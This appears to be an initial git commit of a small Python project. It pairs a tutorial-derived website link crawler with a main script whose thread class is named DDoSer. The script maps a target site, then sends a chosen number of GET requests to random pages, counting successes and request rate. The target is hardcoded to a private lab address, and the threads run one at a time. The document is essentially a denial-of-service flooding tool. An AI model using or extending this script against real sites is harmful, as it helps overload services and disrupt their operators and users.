commit 6de8735eb5edabd3ac0e113c57761587fa67a5dd Author: Llloooggg Date: Sun Apr 19 22:53:20 2020 +0300 init diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..c67789c --- /dev/null +++ b/.gitignore @@ -0,0 +1,5 @@ +./idea +./venv +./vscode +./data.db +./__pycache__ \ No newline at end of file diff --git a/__init__.py b/__init__.py new file mode 100644 index 0000000..bfc36da --- /dev/null +++ b/__init__.py @@ -0,0 +1,83 @@ +import os +import link_extractor +import time +import random +import progressbar +# import urllib.request as requests # urlib +# import faster_than_requests as requests # faster_than_requests +import requests +from datetime import datetime + +from threading import Thread + +global requestCountSuccess, requestCountExecuted + +if not os.path.exists('./maps/'): + os.makedirs('./maps/') + + +def url_grab(full_url): + + if os.path.exists(f'./maps/{url}'): + + with open(f'./maps/{url}', 'r') as f: + subUrls = f.read().splitlines() + else: + + subUrls = link_extractor.extractor('http://' + url) + + os.mknod(f'./maps/{url}') + with open(f'./maps/{url}', 'w') as f: + for link in subUrls: + print(link.strip(), file=f) + + + print(datetime.now().strftime('[%X] ') + 'Карта сайта получена') + return subUrls + + +class DDoSer(Thread): + def __init__(self, url): + Thread.__init__(self) + self.url = url + + def run(self): + + global requestCountSuccess, requestCountExecuted + + # responce = requests.urlopen(self.url).getcode() # urlib + responce = requests.get(self.url).status_code + if responce == 200: + requestCountSuccess += 1 + + requestCountExecuted += 1 + + +if __name__ == '__main__': + + # url = input(datetime.now().strftime('[%x %X] ') + 'Введите адрес сайта: ') + url = '192.168.56.102' + + subUrls = url_grab(url) + + requestCount = int(input(datetime.now().strftime('[%X] ') + 'Введите число запросов: ')) + print() + + startTime = time.time() + requestCountExecuted = 0 + requestCountSuccess = 0 + + with progressbar.ProgressBar(max_value=requestCount) as bar: + for i in range(requestCount): + url = random.choice(subUrls) + thread = DDoSer(url) + thread.start() + thread.join() + bar.update(requestCountExecuted) + + while requestCountExecuted < requestCount: + bar.update(requestCountExecuted) + + print('\n' + datetime.now().strftime('[%X] ') + 'Всего выслано запросов: ' + str(requestCountExecuted)) + print(datetime.now().strftime('[%X] ') + 'Успешных запросов: ' + str(requestCountSuccess)) + print(datetime.now().strftime('[%X] ') + 'Средняя скорость: ' + str(round(requestCountExecuted/(time.time() - startTime))) + ' з/с') diff --git a/link_extractor.py b/link_extractor.py new file mode 100644 index 0000000..e79330d --- /dev/null +++ b/link_extractor.py @@ -0,0 +1,117 @@ +# https://github.com/x4nth055/pythoncode-tutorials/tree/master/web-scraping/link-extractor + +import requests +from urllib.request import urlparse, urljoin +from bs4 import BeautifulSoup +import colorama + +# init the colorama module +colorama.init() + +GREEN = colorama.Fore.GREEN +GRAY = colorama.Fore.LIGHTBLACK_EX +RESET = colorama.Fore.RESET + +# initialize the set of links (unique links) +internal_urls = set() +external_urls = set() + +total_urls_visited = 0 + + +def is_valid(url): + """ + Checks whether `url` is a valid URL. + """ + parsed = urlparse(url) + return bool(parsed.netloc) and bool(parsed.scheme) + + +def get_all_website_links(url): + """ + Returns all URLs that is found on `url` in which it belongs to the same website + """ + # all URLs of `url` + urls = set() + # domain name of the URL without the protocol + domain_name = urlparse(url).netloc + soup = BeautifulSoup(requests.get(url).content, "html.parser") + for a_tag in soup.findAll("a"): + href = a_tag.attrs.get("href") + if href == "" or href is None: + # href empty tag + continue + # join the URL if it's relative (not absolute link) + href = urljoin(url, href) + parsed_href = urlparse(href) + # remove URL GET parameters, URL fragments, etc. + href = parsed_href.scheme + "://" + parsed_href.netloc + parsed_href.path + if not is_valid(href): + # not a valid URL + continue + if href in internal_urls: + # already in the set + continue + if domain_name not in href: + # external link + if href not in external_urls: + print(f"{GRAY}[!] External link: {href}{RESET}") + external_urls.add(href) + continue + print(f"{GREEN}{href}{RESET}") + urls.add(href) + internal_urls.add(href) + return urls + + +def crawl(url, max_urls=50): + """ + Crawls a web page and extracts all links. + You'll find all links in `external_urls` and `internal_urls` global set variables. + params: + max_urls (int): number of max urls to crawl, default is 30. + """ + global total_urls_visited + total_urls_visited += 1 + links = get_all_website_links(url) + for link in links: + if total_urls_visited > max_urls: + break + crawl(link, max_urls=max_urls) + + +def extractor(url): + + crawl(url) + + return internal_urls + + +if __name__ == "__main__": + + import argparse + parser = argparse.ArgumentParser(description="Link Extractor Tool with Python") + parser.add_argument("url", help="The URL to extract links from.") + parser.add_argument("-m", "--max-urls", help="Number of max URLs to crawl, default is 30.", default=30, type=int) + + args = parser.parse_args() + url = args.url + max_urls = args.max_urls + + crawl(url, max_urls=max_urls) + + print("[+] Total Internal links:", len(internal_urls)) + print("[+] Total External links:", len(external_urls)) + print("[+] Total URLs:", len(external_urls) + len(internal_urls)) + + domain_name = urlparse(url).netloc + + # save the internal links to a file + with open(f"{domain_name}_internal_links.txt", "w") as f: + for internal_link in internal_urls: + print(internal_link.strip(), file=f) + + # save the external links to a file + with open(f"{domain_name}_external_links.txt", "w") as f: + for external_link in external_urls: + print(external_link.strip(), file=f) \ No newline at end of file